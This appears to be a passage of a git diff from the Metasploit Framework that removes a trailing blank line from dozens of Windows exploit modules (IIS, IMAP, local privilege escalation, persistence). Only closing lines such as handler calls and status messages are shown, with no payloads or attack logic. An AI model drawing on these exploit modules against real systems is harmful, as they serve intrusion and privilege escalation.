85d3e2e70d..1e0fdf41d3 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb index 47134a1c5c..23acfd14db 100644 --- a/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index ddd9b7270a..0357062808 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index 3802a0df8d..5e3b02bdeb 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -198,5 +198,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/iis/ms01_023_printer.rb b/modules/exploits/windows/iis/ms01_023_printer.rb index 9c6b293622..8d1a2f5ab6 100644 --- a/modules/exploits/windows/iis/ms01_023_printer.rb +++ b/modules/exploits/windows/iis/ms01_023_printer.rb @@ -101,5 +101,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index 8c8e276bd6..d2ebd89282 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -245,5 +245,4 @@ class MetasploitModule < Msf::Exploit::Remote def cleanup framework.events.remove_exploit_subscriber(self) end - end diff --git a/modules/exploits/windows/iis/ms01_033_idq.rb b/modules/exploits/windows/iis/ms01_033_idq.rb index 5a087a59bd..8a0e95e606 100644 --- a/modules/exploits/windows/iis/ms01_033_idq.rb +++ b/modules/exploits/windows/iis/ms01_033_idq.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/iis/ms02_018_htr.rb b/modules/exploits/windows/iis/ms02_018_htr.rb index bf974db4f9..5c0fefebf7 100644 --- a/modules/exploits/windows/iis/ms02_018_htr.rb +++ b/modules/exploits/windows/iis/ms02_018_htr.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index ae23a7f871..91ee889efc 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb index 775ec3aee0..c6a071a6bc 100644 --- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb +++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb @@ -182,5 +182,4 @@ class MetasploitModule < Msf::Exploit::Remote } return false end - end diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 3413b43d65..2b052b30de 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -409,5 +409,4 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', }) end - end diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb index 4406657abb..c854b9bae9 100644 --- a/modules/exploits/windows/imap/eudora_list.rb +++ b/modules/exploits/windows/imap/eudora_list.rb @@ -111,5 +111,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/imail_delete.rb b/modules/exploits/windows/imap/imail_delete.rb index 18103fadcc..413c73fb28 100644 --- a/modules/exploits/windows/imap/imail_delete.rb +++ b/modules/exploits/windows/imap/imail_delete.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/mailenable_login.rb b/modules/exploits/windows/imap/mailenable_login.rb index 10f98b59a8..53133191b6 100644 --- a/modules/exploits/windows/imap/mailenable_login.rb +++ b/modules/exploits/windows/imap/mailenable_login.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/mailenable_status.rb b/modules/exploits/windows/imap/mailenable_status.rb index dc4a6d1e9d..cc4e5f062b 100644 --- a/modules/exploits/windows/imap/mailenable_status.rb +++ b/modules/exploits/windows/imap/mailenable_status.rb @@ -62,5 +62,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb index b82f2757b3..2d28b22f30 100644 --- a/modules/exploits/windows/imap/mailenable_w3c_select.rb +++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb @@ -69,5 +69,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb index 6cf6f5dbdb..94d3df8961 100644 --- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb +++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 3f3328a72b..154267ba87 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/mercur_login.rb b/modules/exploits/windows/imap/mercur_login.rb index 9c9482c351..b02af46cef 100644 --- a/modules/exploits/windows/imap/mercur_login.rb +++ b/modules/exploits/windows/imap/mercur_login.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index fb9443a2b6..40debdd12e 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -88,5 +88,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index e2c0e44728..f358ae7d12 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index b59ea05292..f1b4c86681 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index 70d371cc3b..0549a06647 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index d2ce0d4c65..cfd82759b3 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -76,5 +76,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb index 39b3d46b28..e6d8e14cf3 100644 --- a/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb +++ b/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb @@ -95,5 +95,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb index ab0a4ee39b..b876fcd218 100644 --- a/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb @@ -114,5 +114,4 @@ class MetasploitModule < Msf::Exploit::Remote end return Exploit::CheckCode::Safe end - end diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index 6e121b20ad..72abb7988c 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -89,5 +89,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index ecb723b949..cde15b0b58 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -113,5 +113,4 @@ class MetasploitModule < Msf::Exploit::Remote handler end - end diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index c9369e7c8c..045e3dda1e 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index b04d34e769..92405530dc 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index b319298d8b..562475f290 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -135,7 +135,6 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end =begin diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 7c7387fd0d..8f222bdff4 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -103,7 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end =begin diff --git a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb index d9e40e454b..9a4fa4f452 100644 --- a/modules/exploits/windows/license/flexnet_lmgrd_bof.rb +++ b/modules/exploits/windows/license/flexnet_lmgrd_bof.rb @@ -198,6 +198,5 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/local/agnitum_outpost_acs.rb b/modules/exploits/windows/local/agnitum_outpost_acs.rb index e1f77986c2..f50f8083c0 100644 --- a/modules/exploits/windows/local/agnitum_outpost_acs.rb +++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb @@ -165,5 +165,4 @@ class MetasploitModule < Msf::Exploit::Local end end - end diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index d51926284a..0a34b69420 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -144,6 +144,5 @@ namespace Pop cs end - end diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 77421315df..280d5b4927 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -253,5 +253,4 @@ class MetasploitModule < Msf::Exploit::Local path = Rex::Text.to_unicode(path) path + "\x00" * (520 - path.length) end - end diff --git a/modules/exploits/windows/local/capcom_sys_exec.rb b/modules/exploits/windows/local/capcom_sys_exec.rb index 17be790b76..da355d4165 100644 --- a/modules/exploits/windows/local/capcom_sys_exec.rb +++ b/modules/exploits/windows/local/capcom_sys_exec.rb @@ -124,5 +124,4 @@ class MetasploitModule < Msf::Exploit::Local print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end - end diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index b0e5676c8f..1538180417 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -148,6 +148,5 @@ class MetasploitModule < Msf::Exploit::Local end end - end diff --git a/modules/exploits/windows/local/ikeext_service.rb b/modules/exploits/windows/local/ikeext_service.rb index c757d35b39..f8ccf5b585 100644 --- a/modules/exploits/windows/local/ikeext_service.rb +++ b/modules/exploits/windows/local/ikeext_service.rb @@ -271,6 +271,5 @@ class MetasploitModule < Msf::Exploit::Local end end end - end diff --git a/modules/exploits/windows/local/ipass_launch_app.rb b/modules/exploits/windows/local/ipass_launch_app.rb index d50a3b4ec6..16f8165a7b 100644 --- a/modules/exploits/windows/local/ipass_launch_app.rb +++ b/modules/exploits/windows/local/ipass_launch_app.rb @@ -177,5 +177,4 @@ class MetasploitModule < Msf::Exploit::Local fail_with(Failure::Unknown, 'Failed to write to pipe') end end - end diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb index 80c7d62e0d..3d53f1abc5 100644 --- a/modules/exploits/windows/local/lenovo_systemupdate.rb +++ b/modules/exploits/windows/local/lenovo_systemupdate.rb @@ -189,5 +189,4 @@ class MetasploitModule < Msf::Exploit::Local print_status('Stopping service via ConfigService.exe') config_service(su_directory, 'stop') end - end diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index 439f66252f..d05de3993c 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -94,6 +94,5 @@ class MetasploitModule < Msf::Exploit::Local print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") end - end diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index e5f05e3ab0..742a06bcb9 100644 --- a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -324,5 +324,4 @@ class MetasploitModule < Msf::Exploit::Local content end - end diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index c18f501091..b0d632a677 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -131,6 +131,5 @@ class MetasploitModule < Msf::Exploit::Local end end end - end diff --git a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb index ce7bc709ad..b2bbe35b13 100644 --- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb @@ -125,5 +125,4 @@ class MetasploitModule < Msf::Exploit::Local print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") end - end diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index bb56402d01..a02a03e668 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -121,6 +121,5 @@ window.close(); send_not_found(cli) end end - end diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index fcaf812c21..e073f1eba8 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -173,6 +173,5 @@ class MetasploitModule < Msf::Exploit::Local session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil) super end - end diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb index afe9e2150c..925682bb14 100644 --- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb @@ -150,5 +150,4 @@ class MetasploitModule < Msf::Exploit::Local print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end - end diff --git a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb index 2b56d8a434..4ab3bc6fe7 100644 --- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb +++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb @@ -155,5 +155,4 @@ class MetasploitModule < Msf::Exploit::Local fail_with(Failure::Unknown, 'Error while executing the payload') end end - end diff --git a/modules/exploits/windows/local/ms15_004_tswbproxy.rb b/modules/exploits/windows/local/ms15_004_tswbproxy.rb index 161e0f4ea1..1cc0f0ad54 100644 --- a/modules/exploits/windows/local/ms15_004_tswbproxy.rb +++ b/modules/exploits/windows/local/ms15_004_tswbproxy.rb @@ -125,5 +125,4 @@ class MetasploitModule < Msf::Exploit::Local session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', nil) super end - end diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb index 9679b5481f..a32107269a 100644 --- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb +++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb @@ -142,5 +142,4 @@ class MetasploitModule < Msf::Exploit::Local print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end - end diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb index 6299a85c60..21d2d33e16 100644 --- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb +++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb @@ -390,5 +390,4 @@ class MetasploitModule < Msf::Exploit::Local print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end - end diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb index 2ffeacf1d9..a11c99af38 100644 --- a/modules/exploits/windows/local/novell_client_nicm.rb +++ b/modules/exploits/windows/local/novell_client_nicm.rb @@ -234,5 +234,4 @@ class MetasploitModule < Msf::Exploit::Local fail_with(Failure::Unknown, "Error while executing the payload") end end - end diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb index 302e5d54e8..9e8b531a85 100644 --- a/modules/exploits/windows/local/novell_client_nwfs.rb +++ b/modules/exploits/windows/local/novell_client_nwfs.rb @@ -283,7 +283,6 @@ class MetasploitModule < Msf::Exploit::Local end end - end =begin diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 4483519d1b..c993f73b54 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -149,5 +149,4 @@ class MetasploitModule < Msf::Exploit::Local print_line(e.to_s) end end - end diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index bbae55bc0f..3e4e98c233 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -321,5 +321,4 @@ class MetasploitModule < Msf::Exploit::Local logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc" logfile end - end diff --git a/modules/exploits/windows/local/powershell_cmd_upgrade.rb b/modules/exploits/windows/local/powershell_cmd_upgrade.rb index 60233534e8..903e4b7947 100644 --- a/modules/exploits/windows/local/powershell_cmd_upgrade.rb +++ b/modules/exploits/windows/local/powershell_cmd_upgrade.rb @@ -45,6 +45,5 @@ class MetasploitModule < Msf::Exploit::Local fail_with(Failure::NotVulnerable, "No powershell available.") end end - end diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb index 416b0ac604..c0d101f9fc 100644 --- a/modules/exploits/windows/local/ppr_flatten_rec.rb +++ b/modules/exploits/windows/local/ppr_flatten_rec.rb @@ -162,5 +162,4 @@ class MetasploitModule < Msf::Exploit::Local print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.") end - end diff --git a/modules/exploits/windows/local/ps_persist.rb b/modules/exploits/windows/local/ps_persist.rb index 42fcabfd34..f602213691 100644 --- a/modules/exploits/windows/local/ps_persist.rb +++ b/modules/exploits/windows/local/ps_persist.rb @@ -184,5 +184,4 @@ class MetasploitModule < Msf::Exploit::Local vprint_good("Service Binary #{file_path} Started") end end - end diff --git a/modules/exploits/windows/local/ps_wmi_exec.rb b/modules/exploits/windows/local/ps_wmi_exec.rb index ba32341907..52f1c92bae 100644 --- a/modules/exploits/windows/local/ps_wmi_exec.rb +++ b/modules/exploits/windows/local/ps_wmi_exec.rb @@ -176,7 +176,6 @@ EOS return ps_wrapper end - end diff --git a/modules/exploits/windows/local/pxeexploit.rb b/modules/exploits/windows/local/pxeexploit.rb index 87d7e23654..66aaf60c17 100644 --- a/modules/exploits/windows/local/pxeexploit.rb +++ b/modules/exploits/windows/local/pxeexploit.rb @@ -154,5 +154,4 @@ class MetasploitModule < Msf::Exploit::Remote @dhcp.thread.join print_status("pxesploit attack completed") end - end diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index 63453c3365..3706137de1 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -123,5 +123,4 @@ class MetasploitModule < Msf::Exploit::Local print_status("Launching service #{svr_name}...") service_restart(svr_name) end - end diff --git a/modules/exploits/windows/local/virtual_box_guest_additions.rb b/modules/exploits/windows/local/virtual_box_guest_additions.rb index 9e69251da8..91eb716652 100644 --- a/modules/exploits/windows/local/virtual_box_guest_additions.rb +++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb @@ -202,6 +202,5 @@ class MetasploitModule < Msf::Exploit::Local end end - end diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb index 63d017ef2c..7d598066c0 100644 --- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb +++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb @@ -353,7 +353,6 @@ class MetasploitModule < Msf::Exploit::Local session.railgun.kernel32.CloseHandle(@handle) end end - end =begin diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb index 616f4d2656..0cade189e5 100644 --- a/modules/exploits/windows/local/vss_persistence.rb +++ b/modules/exploits/windows/local/vss_persistence.rb @@ -190,5 +190,4 @@ class MetasploitModule < Msf::Exploit::Local file_local_write(clean_rc, @clean_up) print_status("Cleanup Meterpreter RC File: #{clean_rc}") end - end diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index 2f9c14a222..3583dd8f54 100644 --- a/modules/exploits/windows/local/wmi.rb +++ b/modules/exploits/windows/local/wmi.rb @@ -156,6 +156,5 @@ class MetasploitModule < Msf::Exploit::Local end return array end - end diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 28b92a39c5..81fba2d870 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -62,5 +62,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index ded97806d9..69113e4786 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -62,5 +62,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/achat_bof.rb b/modules/exploits/windows/misc/achat_bof.rb index aec1c13ce7..4549b4a492 100644 --- a/modules/exploits/windows/misc/achat_bof.rb +++ b/modules/exploits/windows/misc/achat_bof.rb @@ -125,5 +125,4 @@ class MetasploitModule < Msf::Exploit::Remote end disconnect_udp end - end diff --git a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb index 5911d441e1..ce2b8687a8 100644 --- a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb +++ b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb @@ -131,5 +131,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 44ec6fdf61..b45c391b9f 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -195,5 +195,4 @@ Processor-Speed=#{processor_speed} client.fs.file.rm(win_file) print_good("Deleted #{win_file}") end - end diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index 61eaa22dcd..eb60dbb4b6 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end - end diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index d90b94187a..9f851c602e 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb index b33f78a112..0aae746a4e 100644 --- a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb +++ b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb @@ -132,5 +132,4 @@ class MetasploitModule < Msf::Exploit::Remote udp_sock.put(request) disconnect_udp end - end diff --git a/modules/exploits/windows/misc/avidphoneticindexer.rb b/modules/exploits/windows/misc/avidphoneticindexer.rb index e215d34e58..03f55d97f2 100644 --- a/modules/exploits/windows/misc/avidphoneticindexer.rb +++ b/modules/exploits/windows/misc/avidphoneticindexer.rb @@ -105,5 +105,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index f6146c9280..8fd48fde70 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -148,5 +148,4 @@ class MetasploitModule < Msf::Exploit::Remote def wfs_delay 5 end - end diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index d3ba04330b..e891151c56 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -63,5 +63,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index f5b188ff1f..002a96f340 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -69,5 +69,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index 90aeca4439..72cddf2c71 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb index e739f21c6f..6d6c6bdcb6 100644 --- a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb +++ 